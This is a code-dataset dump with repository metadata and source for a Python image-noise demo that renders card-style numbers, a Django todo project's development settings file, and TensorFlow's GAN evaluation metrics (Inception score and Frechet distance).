| hexsha (stringlengths 40-40) | size (int64 4-1.02M) | ext (stringclasses, 8 values) | lang (stringclasses, 1 value) | max_stars_repo_path (stringlengths 4-209) | max_stars_repo_name (stringlengths 5-121) | max_stars_repo_head_hexsha (stringlengths 40-40) | max_stars_repo_licenses (listlengths 1-10) | max_stars_count (int64 1-191k, ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24-24, ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24-24, ⌀) | max_issues_repo_path (stringlengths 4-209) | max_issues_repo_name (stringlengths 5-121) | max_issues_repo_head_hexsha (stringlengths 40-40) | max_issues_repo_licenses (listlengths 1-10) | max_issues_count (int64 1-67k, ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24-24, ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24-24, ⌀) | max_forks_repo_path (stringlengths 4-209) | max_forks_repo_name (stringlengths 5-121) | max_forks_repo_head_hexsha (stringlengths 40-40) | max_forks_repo_licenses (listlengths 1-10) | max_forks_count (int64 1-105k, ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24-24, ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24-24, ⌀) | content (stringlengths 4-1.02M) | avg_line_length (float64 1.07-66.1k) | max_line_length (int64 4-266k) | alphanum_fraction (float64 0.01-1) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
56d069f936f05834c7ec7bb88b2ed427f7707994
| 1,966
|
py
|
Python
|
action/demo5/d2.py
|
pearpai/TensorFlow-action
|
264099d933988532ed59eaf0f2ad495d40ede4d2
|
[
"Apache-2.0"
] | 3
|
2018-06-07T07:15:00.000Z
|
2018-10-09T07:59:50.000Z
|
action/demo5/d2.py
|
pearpai/TensorFlow-action
|
264099d933988532ed59eaf0f2ad495d40ede4d2
|
[
"Apache-2.0"
] | null | null | null |
action/demo5/d2.py
|
pearpai/TensorFlow-action
|
264099d933988532ed59eaf0f2ad495d40ede4d2
|
[
"Apache-2.0"
] | 4
|
2017-04-23T05:30:41.000Z
|
2018-09-27T07:13:37.000Z
|
# -*- coding: utf-8 -*-
import os
import StringIO
from PIL import Image, ImageFont, ImageDraw
import pygame
import random
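# demo1 renders a bank-card-style number with a pygame font, pastes it onto a
# randomly coloured PIL background, overlays random noise lines, and saves the
# result as t.jpg (note: this is Python 2 code, e.g. StringIO and print statements).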
def demo1():
pygame.init()
text = ' 6231 6260 3100 3992 '
bgcolor = (int(random.uniform(0, 255)), int(random.uniform(0, 255)), int(random.uniform(0, 255)))
card_no_color = (int(random.uniform(0, 255)), int(random.uniform(0, 255)), int(random.uniform(0, 255)))
im = Image.new("RGB", (400, 50), bgcolor)
# dr = ImageDraw.Draw(im)
# font = ImageFont.truetype(os.path.join("fonts", "simsun.ttc"), 18)
font = pygame.font.SysFont('Microsoft YaHei', 50)
# font = pygame.font.SysFont('Farrington-7B-Qiqi', 50)
# font = ImageFont.truetype("font/Farrington-7B-Qiqi.ttf", 50)
# dr.text((10, 5), text, font=font, fill="#000000")
rtext = font.render(text, True, card_no_color, bgcolor)
# pygame.image.save(rtext, "t.gif")
sio = StringIO.StringIO()
pygame.image.save(rtext, sio)
sio.seek(0)
line = Image.open(sio)
im.paste(line, (10, 10))
img_d = ImageDraw.Draw(im)
x_len, y_len = im.size
print im.size
for _ in range(15):
noise_color = (int(random.uniform(0, 255)), int(random.uniform(0, 255)), int(random.uniform(0, 255)))
img_d.line(((random.uniform(1, x_len), random.uniform(1, y_len)),
(random.uniform(1, x_len), random.uniform(1, y_len))), noise_color)
# im.show()
im.save("t.jpg")
def demo2():
# Open the image
img = Image.open('t.jpg')
img_d = ImageDraw.Draw(img)
# Get the image's width (x) and height (y) in pixels
x_len, y_len = img.size
for _ in range(15):
noise_color = (int(random.uniform(0, 255)), int(random.uniform(0, 255)), int(random.uniform(0, 255)))
img_d.line(((random.uniform(1, x_len), random.uniform(1, y_len)),
(random.uniform(1, x_len), random.uniform(1, y_len))), noise_color)
# Save the image
img.save('ii.jpg')
if __name__ == '__main__':
demo1()
# demo2()
| 29.343284
| 109
| 0.612411
|
abec88cffca7c67a8b98b846f296849862435bb6
| 3,663
|
py
|
Python
|
todotrains/settings.py
|
princeofnubia/todo-trains
|
d1440ba88e2a89436681f0d66b290b1d45f719d6
|
[
"BSD-2-Clause"
] | null | null | null |
todotrains/settings.py
|
princeofnubia/todo-trains
|
d1440ba88e2a89436681f0d66b290b1d45f719d6
|
[
"BSD-2-Clause"
] | null | null | null |
todotrains/settings.py
|
princeofnubia/todo-trains
|
d1440ba88e2a89436681f0d66b290b1d45f719d6
|
[
"BSD-2-Clause"
] | 4
|
2021-07-13T10:29:36.000Z
|
2021-07-27T15:55:47.000Z
|
"""
Django settings for todotrains project.
Generated by 'django-admin startproject' using Django 3.2.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-jyx7a03dj838*f&081eci6u8bovb^0&ueh-yc67bh*mfh@r)c+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'todo.apps.TodoConfig',
'corsheaders',
'rest_framework'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ALLOW_ALL_ORIGINS = True
ROOT_URLCONF = 'todotrains.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['page/templates','todo/templates','user/templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todotrains.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
#'ENGINE': 'django.db.backends.mysql',
'ENGINE': 'django.db.backends.sqlite3',
'USER': 'root',
'PASSWORD':'',
'HOST': 'localhost',
'PORT': '3306',
'NAME': 'Exquistodo'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/asset/'
STATICFILES_DIRS=[
BASE_DIR /'page/asset'
]
STATIC_ROOT= BASE_DIR/"asset"
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| 25.615385
| 91
| 0.69424
|
b17975811247aebc759bc4b16e5ad703df4bb1b9
| 27,933
|
py
|
Python
|
tensorflow/contrib/gan/python/eval/python/classifier_metrics_impl.py
|
deltheil/tensorflow
|
48178e04e3ef764cda5c9746637e978b080fabf2
|
[
"Apache-2.0"
] | 13
|
2018-07-23T18:53:35.000Z
|
2021-11-18T19:56:45.000Z
|
tensorflow/contrib/gan/python/eval/python/classifier_metrics_impl.py
|
QinganZhao/tensorflow
|
6f0dd0425c51360fe2be5a938a8f3fb39e420fa3
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/gan/python/eval/python/classifier_metrics_impl.py
|
QinganZhao/tensorflow
|
6f0dd0425c51360fe2be5a938a8f3fb39e420fa3
|
[
"Apache-2.0"
] | 13
|
2018-09-07T13:28:38.000Z
|
2020-07-17T15:06:24.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model evaluation tools for TFGAN.
These methods come from https://arxiv.org/abs/1606.03498 and
https://arxiv.org/abs/1706.08500.
NOTE: This implementation uses the same weights as in
https://github.com/openai/improved-gan/blob/master/inception_score/model.py,
but is more numerically stable and is an unbiased estimator of the true
Inception score even when splitting the inputs into batches.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import sys
import tarfile
from six.moves import urllib
from tensorflow.contrib.layers.python.layers import layers
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import image_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_impl
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import gfile
from tensorflow.python.platform import resource_loader
__all__ = [
'get_graph_def_from_disk',
'get_graph_def_from_resource',
'get_graph_def_from_url_tarball',
'preprocess_image',
'run_image_classifier',
'run_inception',
'inception_score',
'classifier_score',
'classifier_score_from_logits',
'frechet_inception_distance',
'frechet_classifier_distance',
'frechet_classifier_distance_from_activations',
'mean_only_frechet_classifier_distance_from_activations',
'diagonal_only_frechet_classifier_distance_from_activations',
'INCEPTION_DEFAULT_IMAGE_SIZE',
]
INCEPTION_URL = 'http://download.tensorflow.org/models/frozen_inception_v1_2015_12_05.tar.gz'
INCEPTION_FROZEN_GRAPH = 'inceptionv1_for_inception_score.pb'
INCEPTION_INPUT = 'Mul:0'
INCEPTION_OUTPUT = 'logits:0'
INCEPTION_FINAL_POOL = 'pool_3:0'
INCEPTION_DEFAULT_IMAGE_SIZE = 299
def _validate_images(images, image_size):
images = ops.convert_to_tensor(images)
images.shape.with_rank(4)
images.shape.assert_is_compatible_with([None, image_size, image_size, None])
return images
def _symmetric_matrix_square_root(mat, eps=1e-10):
"""Compute square root of a symmetric matrix.
Note that this is different from an elementwise square root. We want to
compute M' where M' = sqrt(mat) such that M' * M' = mat.
Also note that this method **only** works for symmetric matrices.
Args:
mat: Matrix to take the square root of.
eps: Small epsilon such that any element less than eps will not be square
rooted to guard against numerical instability.
Returns:
Matrix square root of mat.
"""
# Unlike numpy, tensorflow's return order is (s, u, v)
s, u, v = linalg_ops.svd(mat)
# sqrt is unstable around 0, just use 0 in such case
si = array_ops.where(math_ops.less(s, eps), s, math_ops.sqrt(s))
# Note that the v returned by Tensorflow is v = V
# (when referencing the equation A = U S V^T)
# This is unlike Numpy which returns v = V^T
return math_ops.matmul(
math_ops.matmul(u, array_ops.diag(si)), v, transpose_b=True)
def preprocess_image(images,
height=INCEPTION_DEFAULT_IMAGE_SIZE,
width=INCEPTION_DEFAULT_IMAGE_SIZE,
scope=None):
"""Prepare a batch of images for evaluation.
This is the preprocessing portion of the graph from
http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz.
Note that it expects Tensors in [0, 255]. This function maps pixel values to
[-1, 1] and resizes to match the InceptionV1 network.
Args:
images: 3-D or 4-D Tensor of images. Values are in [0, 255].
height: Integer. Height of resized output image.
width: Integer. Width of resized output image.
scope: Optional scope for name_scope.
Returns:
3-D or 4-D float Tensor of prepared image(s). Values are in [-1, 1].
"""
is_single = images.shape.ndims == 3
with ops.name_scope(scope, 'preprocess', [images, height, width]):
if not images.dtype.is_floating:
images = math_ops.to_float(images)
if is_single:
images = array_ops.expand_dims(images, axis=0)
resized = image_ops.resize_bilinear(images, [height, width])
resized = (resized - 128.0) / 128.0
if is_single:
resized = array_ops.squeeze(resized, axis=0)
return resized
def _kl_divergence(p, p_logits, q):
"""Computes the Kullback-Liebler divergence between p and q.
This function uses p's logits in some places to improve numerical stability.
Specifically:
KL(p || q) = sum[ p * log(p / q) ]
= sum[ p * ( log(p) - log(q) ) ]
= sum[ p * ( log_softmax(p_logits) - log(q) ) ]
Args:
p: A 2-D floating-point Tensor p_ij, where `i` corresponds to the minibatch
example and `j` corresponds to the probability of being in class `j`.
p_logits: A 2-D floating-point Tensor corresponding to logits for `p`.
q: A 1-D floating-point Tensor, where q_j corresponds to the probability
of class `j`.
Returns:
KL divergence between two distributions. Output dimension is 1D, one entry
per distribution in `p`.
Raises:
ValueError: If any of the inputs aren't floating-point.
ValueError: If p or p_logits aren't 2D.
ValueError: If q isn't 1D.
"""
for tensor in [p, p_logits, q]:
if not tensor.dtype.is_floating:
raise ValueError('Input %s must be floating type.', tensor.name)
p.shape.assert_has_rank(2)
p_logits.shape.assert_has_rank(2)
q.shape.assert_has_rank(1)
return math_ops.reduce_sum(
p * (nn_ops.log_softmax(p_logits) - math_ops.log(q)), axis=1)
def get_graph_def_from_disk(filename):
"""Get a GraphDef proto from a disk location."""
with gfile.FastGFile(filename, 'rb') as f:
return graph_pb2.GraphDef.FromString(f.read())
def get_graph_def_from_resource(filename):
"""Get a GraphDef proto from within a .par file."""
return graph_pb2.GraphDef.FromString(resource_loader.load_resource(filename))
def get_graph_def_from_url_tarball(url, filename, tar_filename=None):
"""Get a GraphDef proto from a tarball on the web.
Args:
url: Web address of tarball
filename: Filename of graph definition within tarball
tar_filename: Temporary download filename (None = always download)
Returns:
A GraphDef loaded from a file in the downloaded tarball.
"""
if not (tar_filename and os.path.exists(tar_filename)):
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %s %.1f%%' %
(url,
float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
tar_filename, _ = urllib.request.urlretrieve(url, tar_filename, _progress)
with tarfile.open(tar_filename, 'r:gz') as tar:
proto_str = tar.extractfile(filename).read()
return graph_pb2.GraphDef.FromString(proto_str)
def _default_graph_def_fn():
return get_graph_def_from_url_tarball(INCEPTION_URL, INCEPTION_FROZEN_GRAPH,
os.path.basename(INCEPTION_URL))
def run_inception(images,
graph_def=None,
default_graph_def_fn=_default_graph_def_fn,
image_size=INCEPTION_DEFAULT_IMAGE_SIZE,
input_tensor=INCEPTION_INPUT,
output_tensor=INCEPTION_OUTPUT):
"""Run images through a pretrained Inception classifier.
Args:
images: Input tensors. Must be [batch, height, width, channels]. Input shape
and values must be in [-1, 1], which can be achieved using
`preprocess_image`.
graph_def: A GraphDef proto of a pretrained Inception graph. If `None`,
call `default_graph_def_fn` to get GraphDef.
default_graph_def_fn: A function that returns a GraphDef. Used if
`graph_def` is `None`. By default, returns a pretrained InceptionV3 graph.
image_size: Required image width and height. See unit tests for the default
values.
input_tensor: Name of input Tensor.
output_tensor: Name or list of output Tensors. This function will compute
activations at the specified layer. Examples include INCEPTION_V3_OUTPUT
and INCEPTION_V3_FINAL_POOL which would result in this function computing
the final logits or the penultimate pooling layer.
Returns:
Tensor or Tensors corresponding to computed `output_tensor`.
Raises:
ValueError: If images are not the correct size.
ValueError: If neither `graph_def` nor `default_graph_def_fn` are provided.
"""
images = _validate_images(images, image_size)
if graph_def is None:
if default_graph_def_fn is None:
raise ValueError('If `graph_def` is `None`, must provide '
'`default_graph_def_fn`.')
graph_def = default_graph_def_fn()
activations = run_image_classifier(images, graph_def, input_tensor,
output_tensor)
if isinstance(activations, list):
for i, activation in enumerate(activations):
if array_ops.rank(activation) != 2:
activations[i] = layers.flatten(activation)
else:
if array_ops.rank(activations) != 2:
activations = layers.flatten(activations)
return activations
def run_image_classifier(tensor,
graph_def,
input_tensor,
output_tensor,
scope='RunClassifier'):
"""Runs a network from a frozen graph.
Args:
tensor: An Input tensor.
graph_def: A GraphDef proto.
input_tensor: Name of input tensor in graph def.
output_tensor: A tensor name or list of tensor names in graph def.
scope: Name scope for classifier.
Returns:
Classifier output if `output_tensor` is a string, or a list of outputs if
`output_tensor` is a list.
Raises:
ValueError: If `input_tensor` or `output_tensor` aren't in the graph_def.
"""
input_map = {input_tensor: tensor}
is_singleton = isinstance(output_tensor, str)
if is_singleton:
output_tensor = [output_tensor]
classifier_outputs = importer.import_graph_def(
graph_def, input_map, output_tensor, name=scope)
if is_singleton:
classifier_outputs = classifier_outputs[0]
return classifier_outputs
def classifier_score(images, classifier_fn, num_batches=1):
"""Classifier score for evaluating a conditional generative model.
This is based on the Inception Score, but for an arbitrary classifier.
This technique is described in detail in https://arxiv.org/abs/1606.03498. In
summary, this function calculates
exp( E[ KL(p(y|x) || p(y)) ] )
which captures how different the network's classification prediction is from
the prior distribution over classes.
NOTE: This function consumes images, computes their logits, and then
computes the classifier score. If you would like to precompute many logits for
large batches, use classifier_score_from_logits(), which this method also
uses.
Args:
images: Images to calculate the classifier score for.
classifier_fn: A function that takes images and produces logits based on a
classifier.
num_batches: Number of batches to split `generated_images` into in order to
efficiently run them through the classifier network.
Returns:
The classifier score. A floating-point scalar of the same type as the output
of `classifier_fn`.
"""
generated_images_list = array_ops.split(
images, num_or_size_splits=num_batches)
# Compute the classifier splits using the memory-efficient `map_fn`.
logits = functional_ops.map_fn(
fn=classifier_fn,
elems=array_ops.stack(generated_images_list),
parallel_iterations=1,
back_prop=False,
swap_memory=True,
name='RunClassifier')
logits = array_ops.concat(array_ops.unstack(logits), 0)
return classifier_score_from_logits(logits)
def classifier_score_from_logits(logits):
"""Classifier score for evaluating a generative model from logits.
This method computes the classifier score for a set of logits. This can be
used independently of the classifier_score() method, especially in the case
of using large batches during evaluation where we would like to precompute all
of the logits before computing the classifier score.
This technique is described in detail in https://arxiv.org/abs/1606.03498. In
summary, this function calculates:
exp( E[ KL(p(y|x) || p(y)) ] )
which captures how different the network's classification prediction is from
the prior distribution over classes.
Args:
logits: Precomputed 2D tensor of logits that will be used to
compute the classifier score.
Returns:
The classifier score. A floating-point scalar of the same type as the output
of `logits`.
"""
logits.shape.assert_has_rank(2)
# Use maximum precision for best results.
logits_dtype = logits.dtype
if logits_dtype != dtypes.float64:
logits = math_ops.to_double(logits)
p = nn_ops.softmax(logits)
q = math_ops.reduce_mean(p, axis=0)
kl = _kl_divergence(p, logits, q)
kl.shape.assert_has_rank(1)
log_score = math_ops.reduce_mean(kl)
final_score = math_ops.exp(log_score)
if logits_dtype != dtypes.float64:
final_score = math_ops.cast(final_score, logits_dtype)
return final_score
inception_score = functools.partial(
classifier_score,
classifier_fn=functools.partial(
run_inception, output_tensor=INCEPTION_OUTPUT))
def trace_sqrt_product(sigma, sigma_v):
"""Find the trace of the positive sqrt of product of covariance matrices.
'_symmetric_matrix_square_root' only works for symmetric matrices, so we
cannot just take _symmetric_matrix_square_root(sigma * sigma_v).
('sigma' and 'sigma_v' are symmetric, but their product is not necessarily).
Let sigma = A A so A = sqrt(sigma), and sigma_v = B B.
We want to find trace(sqrt(sigma sigma_v)) = trace(sqrt(A A B B))
Note the following properties:
(i) forall M1, M2: eigenvalues(M1 M2) = eigenvalues(M2 M1)
=> eigenvalues(A A B B) = eigenvalues (A B B A)
(ii) if M1 = sqrt(M2), then eigenvalues(M1) = sqrt(eigenvalues(M2))
=> eigenvalues(sqrt(sigma sigma_v)) = sqrt(eigenvalues(A B B A))
(iii) forall M: trace(M) = sum(eigenvalues(M))
=> trace(sqrt(sigma sigma_v)) = sum(eigenvalues(sqrt(sigma sigma_v)))
= sum(sqrt(eigenvalues(A B B A)))
= sum(eigenvalues(sqrt(A B B A)))
= trace(sqrt(A B B A))
= trace(sqrt(A sigma_v A))
A = sqrt(sigma). Both sigma and A sigma_v A are symmetric, so we **can**
use the _symmetric_matrix_square_root function to find the roots of these
matrices.
Args:
sigma: a square, symmetric, real, positive semi-definite covariance matrix
sigma_v: same as sigma
Returns:
The trace of the positive square root of sigma*sigma_v
"""
# Note sqrt_sigma is called "A" in the proof above
sqrt_sigma = _symmetric_matrix_square_root(sigma)
# This is sqrt(A sigma_v A) above
sqrt_a_sigmav_a = math_ops.matmul(sqrt_sigma,
math_ops.matmul(sigma_v, sqrt_sigma))
return math_ops.trace(_symmetric_matrix_square_root(sqrt_a_sigmav_a))
def frechet_classifier_distance(real_images,
generated_images,
classifier_fn,
num_batches=1):
"""Classifier distance for evaluating a generative model.
This is based on the Frechet Inception distance, but for an arbitrary
classifier.
This technique is described in detail in https://arxiv.org/abs/1706.08500.
Given two Gaussian distributions with means m and m_w and covariance matrices
C and C_w, this function calculates
|m - m_w|^2 + Tr(C + C_w - 2(C * C_w)^(1/2))
which captures how different the distributions of real images and generated
images (or more accurately, their visual features) are. Note that unlike the
Inception score, this is a true distance and utilizes information about real
world images.
Note that when computed using sample means and sample covariance matrices,
Frechet distance is biased. It is more biased for small sample sizes. (e.g.
even if the two distributions are the same, for a small sample size, the
expected Frechet distance is large). It is important to use the same
sample size to compute Frechet classifier distance when comparing two
generative models.
NOTE: This function consumes images, computes their activations, and then
computes the classifier score. If you would like to precompute many
activations for real and generated images for large batches, please use
frechet_classifier_distance_from_activations(), which this method also uses.
Args:
real_images: Real images to use to compute Frechet Inception distance.
generated_images: Generated images to use to compute Frechet Inception
distance.
classifier_fn: A function that takes images and produces activations
based on a classifier.
num_batches: Number of batches to split images into in order to
efficiently run them through the classifier network.
Returns:
The Frechet Inception distance. A floating-point scalar of the same type
as the output of `classifier_fn`.
"""
real_images_list = array_ops.split(
real_images, num_or_size_splits=num_batches)
generated_images_list = array_ops.split(
generated_images, num_or_size_splits=num_batches)
imgs = array_ops.stack(real_images_list + generated_images_list)
# Compute the activations using the memory-efficient `map_fn`.
activations = functional_ops.map_fn(
fn=classifier_fn,
elems=imgs,
parallel_iterations=1,
back_prop=False,
swap_memory=True,
name='RunClassifier')
# Split the activations by the real and generated images.
real_a, gen_a = array_ops.split(activations, [num_batches, num_batches], 0)
# Ensure the activations have the right shapes.
real_a = array_ops.concat(array_ops.unstack(real_a), 0)
gen_a = array_ops.concat(array_ops.unstack(gen_a), 0)
return frechet_classifier_distance_from_activations(real_a, gen_a)
def mean_only_frechet_classifier_distance_from_activations(
real_activations, generated_activations):
"""Classifier distance for evaluating a generative model from activations.
Given two Gaussian distributions with means m and m_w and covariance matrices
C and C_w, this function calculates
|m - m_w|^2
which captures how different the distributions of real images and generated
images (or more accurately, their visual features) are. Note that unlike the
Inception score, this is a true distance and utilizes information about real
world images.
Note that when computed using sample means and sample covariance matrices,
Frechet distance is biased. It is more biased for small sample sizes. (e.g.
even if the two distributions are the same, for a small sample size, the
expected Frechet distance is large). It is important to use the same
sample size to compute frechet classifier distance when comparing two
generative models.
In this variant, we only compute the difference between the means of the
fitted Gaussians. The computation leads to O(n) vs. O(n^2) memory usage, yet
still retains much of the same information as FID.
Args:
real_activations: 2D array of activations of real images of size
[num_images, num_dims] to use to compute Frechet Inception distance.
generated_activations: 2D array of activations of generated images of size
[num_images, num_dims] to use to compute Frechet Inception distance.
Returns:
The mean-only Frechet Inception distance. A floating-point scalar of the
same type as the output of the activations.
"""
real_activations.shape.assert_has_rank(2)
generated_activations.shape.assert_has_rank(2)
activations_dtype = real_activations.dtype
if activations_dtype != dtypes.float64:
real_activations = math_ops.to_double(real_activations)
generated_activations = math_ops.to_double(generated_activations)
# Compute means of activations.
m = math_ops.reduce_mean(real_activations, 0)
m_w = math_ops.reduce_mean(generated_activations, 0)
# Next the distance between means.
mean = math_ops.square(linalg_ops.norm(m - m_w)) # This uses the L2 norm.
mofid = mean
if activations_dtype != dtypes.float64:
mofid = math_ops.cast(mofid, activations_dtype)
return mofid
def diagonal_only_frechet_classifier_distance_from_activations(
real_activations, generated_activations):
"""Classifier distance for evaluating a generative model.
This is based on the Frechet Inception distance, but for an arbitrary
classifier.
This technique is described in detail in https://arxiv.org/abs/1706.08500.
Given two Gaussian distributions with means m and m_w and covariance matrices
C and C_w, this function calculates
|m - m_w|^2 + (sigma + sigma_w - 2(sigma x sigma_w)^(1/2))
which captures how different the distributions of real images and generated
images (or more accurately, their visual features) are. Note that unlike the
Inception score, this is a true distance and utilizes information about real
world images. In this variant, we compute diagonal-only covariance matrices.
As a result, instead of computing an expensive matrix square root, we can do
something much simpler, and has O(n) vs O(n^2) space complexity.
Note that when computed using sample means and sample covariance matrices,
Frechet distance is biased. It is more biased for small sample sizes. (e.g.
even if the two distributions are the same, for a small sample size, the
expected Frechet distance is large). It is important to use the same
sample size to compute frechet classifier distance when comparing two
generative models.
Args:
real_activations: Real images to use to compute Frechet Inception distance.
generated_activations: Generated images to use to compute Frechet Inception
distance.
Returns:
The diagonal-only Frechet Inception distance. A floating-point scalar of
the same type as the output of the activations.
Raises:
ValueError: If the shape of the variance and mean vectors are not equal.
"""
real_activations.shape.assert_has_rank(2)
generated_activations.shape.assert_has_rank(2)
activations_dtype = real_activations.dtype
if activations_dtype != dtypes.float64:
real_activations = math_ops.to_double(real_activations)
generated_activations = math_ops.to_double(generated_activations)
# Compute mean and covariance matrices of activations.
m, var = nn_impl.moments(real_activations, axes=[0])
m_w, var_w = nn_impl.moments(generated_activations, axes=[0])
actual_shape = var.get_shape()
expected_shape = m.get_shape()
if actual_shape != expected_shape:
raise ValueError('shape: {} must match expected shape: {}'.format(
actual_shape, expected_shape))
# Compute the two components of FID.
# First the covariance component.
# Here, note that trace(A + B) = trace(A) + trace(B)
trace = math_ops.reduce_sum(
(var + var_w) - 2.0 * math_ops.sqrt(math_ops.multiply(var, var_w)))
# Next the distance between means.
mean = math_ops.square(linalg_ops.norm(m - m_w)) # This uses the L2 norm.
dofid = trace + mean
if activations_dtype != dtypes.float64:
dofid = math_ops.cast(dofid, activations_dtype)
return dofid
def frechet_classifier_distance_from_activations(real_activations,
generated_activations):
"""Classifier distance for evaluating a generative model.
This method computes the Frechet classifier distance from activations of
real images and generated images. This can be used independently of the
frechet_classifier_distance() method, especially in the case of using large
batches during evaluation where we would like to precompute all of the
activations before computing the classifier distance.
This technique is described in detail in https://arxiv.org/abs/1706.08500.
Given two Gaussian distributions with means m and m_w and covariance matrices
C and C_w, this function calculates
|m - m_w|^2 + Tr(C + C_w - 2(C * C_w)^(1/2))
which captures how different the distributions of real images and generated
images (or more accurately, their visual features) are. Note that unlike the
Inception score, this is a true distance and utilizes information about real
world images.
Note that when computed using sample means and sample covariance matrices,
Frechet distance is biased. It is more biased for small sample sizes. (e.g.
even if the two distributions are the same, for a small sample size, the
expected Frechet distance is large). It is important to use the same
sample size to compute frechet classifier distance when comparing two
generative models.
Args:
real_activations: 2D Tensor containing activations of real data. Shape is
[batch_size, activation_size].
generated_activations: 2D Tensor containing activations of generated data.
Shape is [batch_size, activation_size].
Returns:
The Frechet Inception distance. A floating-point scalar of the same type
as the output of the activations.
"""
real_activations.shape.assert_has_rank(2)
generated_activations.shape.assert_has_rank(2)
activations_dtype = real_activations.dtype
if activations_dtype != dtypes.float64:
real_activations = math_ops.to_double(real_activations)
generated_activations = math_ops.to_double(generated_activations)
# Compute mean and covariance matrices of activations.
m = math_ops.reduce_mean(real_activations, 0)
m_w = math_ops.reduce_mean(generated_activations, 0)
num_examples = math_ops.to_double(array_ops.shape(real_activations)[0])
# sigma = (1 / (n - 1)) * (X - mu) (X - mu)^T
real_centered = real_activations - m
sigma = math_ops.matmul(
real_centered, real_centered, transpose_a=True) / (
num_examples - 1)
gen_centered = generated_activations - m_w
sigma_w = math_ops.matmul(
gen_centered, gen_centered, transpose_a=True) / (
num_examples - 1)
# Find the Tr(sqrt(sigma sigma_w)) component of FID
sqrt_trace_component = trace_sqrt_product(sigma, sigma_w)
# Compute the two components of FID.
# First the covariance component.
# Here, note that trace(A + B) = trace(A) + trace(B)
trace = math_ops.trace(sigma + sigma_w) - 2.0 * sqrt_trace_component
# Next the distance between means.
mean = math_ops.square(linalg_ops.norm(m - m_w)) # This uses the L2 norm.
fid = trace + mean
if activations_dtype != dtypes.float64:
fid = math_ops.cast(fid, activations_dtype)
return fid
frechet_inception_distance = functools.partial(
frechet_classifier_distance,
classifier_fn=functools.partial(
run_inception, output_tensor=INCEPTION_FINAL_POOL))
| 38.159836
| 93
| 0.728135
|
57967cd1109928af716f0b20ac04e7dc7c0ca248
| 624
|
py
|
Python
|
python/ray/experimental/workflow/tests/test_dynamic_workflow_ref.py
|
77loopin/ray
|
9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 1
|
2022-01-10T07:41:17.000Z
|
2022-01-10T07:41:17.000Z
|
python/ray/experimental/workflow/tests/test_dynamic_workflow_ref.py
|
77loopin/ray
|
9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 61
|
2021-01-30T08:05:55.000Z
|
2022-03-26T07:06:15.000Z
|
python/ray/experimental/workflow/tests/test_dynamic_workflow_ref.py
|
77loopin/ray
|
